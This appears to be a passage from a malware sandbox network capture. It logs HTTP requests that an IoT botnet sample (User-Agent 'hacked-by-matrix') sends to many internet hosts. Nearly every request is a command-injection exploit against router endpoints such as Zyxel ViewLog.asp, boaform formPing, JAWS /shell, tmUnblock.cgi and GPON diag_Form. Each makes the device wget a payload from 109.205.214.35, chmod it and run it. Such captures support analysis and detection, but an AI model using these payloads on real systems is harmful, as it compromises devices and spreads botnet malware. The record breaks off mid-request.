                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        671192.168.2.1333276213.243.27.1171723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:48.227416992 CET270OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        672192.168.2.134288818.238.74.13980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:48.331181049 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:48.418914080 CET927INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"><TITLE>ERROR: The request could not be satisfied</TITLE


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        673192.168.2.133963413.32.155.3880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:48.337433100 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:48.433034897 CET927INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"><TITLE>ERROR: The request could not be satisfied</TITLE


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        674192.168.2.1352436169.55.68.21880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:48.339195967 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        675192.168.2.1350718178.253.30.5280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:48.360344887 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        676192.168.2.134725623.88.60.880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:48.591712952 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:48.764811039 CET200INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68
                                                        Data Ascii: <html><head><title>401 Authorization Required</title></head><body><center><h1>401 Authorization Required</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        677192.168.2.1338894181.105.126.21180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:48.644017935 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:50.092274904 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:50.348925114 CET161INHTTP/1.1 404 Not Found
                                                        Server: Boa/0.94.13
                                                        Date: Thu, 21 Mar 2024 04:23:01 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 126
                                                        Connection: close
                                                        Mar 21, 2024 05:22:50.349028111 CET138INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f
                                                        Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        678192.168.2.1352854122.112.247.5080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:48.960577011 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        679192.168.2.135482483.96.246.12480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:49.366483927 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:49.908680916 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:50.447341919 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:50.612812996 CET531INHTTP/1.1 301 Moved Permanently
                                                        Date: Thu, 21 Mar 2024 04:22:50 GMT
                                                        Server: Apache
                                                        Location: https://evaluaties.hhs.nl/cgi-bin/ViewLog.asp
                                                        Content-Length: 253
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 76 61 6c 75 61 74 69 65 73 2e 68 68 73 2e 6e 6c 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://evaluaties.hhs.nl/cgi-bin/ViewLog.asp">here</a>.</p></body></html>
                                                        Mar 21, 2024 05:22:50.612951994 CET404INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:22:50 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        680192.168.2.134494462.29.55.1461723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:49.473587990 CET270OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        681192.168.2.1334352172.67.223.1098080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:49.476289988 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        682192.168.2.1341218172.65.140.2088080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:49.476454973 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        683192.168.2.133924449.0.79.5280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.143421888 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:51.299315929 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:52.428237915 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:52.825489044 CET129INHTTP/1.1 200 OK
                                                        Cache-control:no-cache
                                                        Content-Type:text/html
                                                        Transfer-Encoding:chunked
                                                        Connection:Keep-Alive
                                                        Mar 21, 2024 05:22:52.825495958 CET479INData Raw: 31 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33
                                                        Data Ascii: 1c7<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" http-equiv="Content-T


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        684192.168.2.136053862.29.102.71723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.469072104 CET270OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        685192.168.2.134613662.29.125.1741723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.476483107 CET270OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        686192.168.2.1348722118.225.115.35443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.624000072 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        687192.168.2.1344178109.178.12.210443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.624006033 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        688192.168.2.13340085.73.83.50443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.624017000 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        689192.168.2.1349308212.24.45.33443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.624025106 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
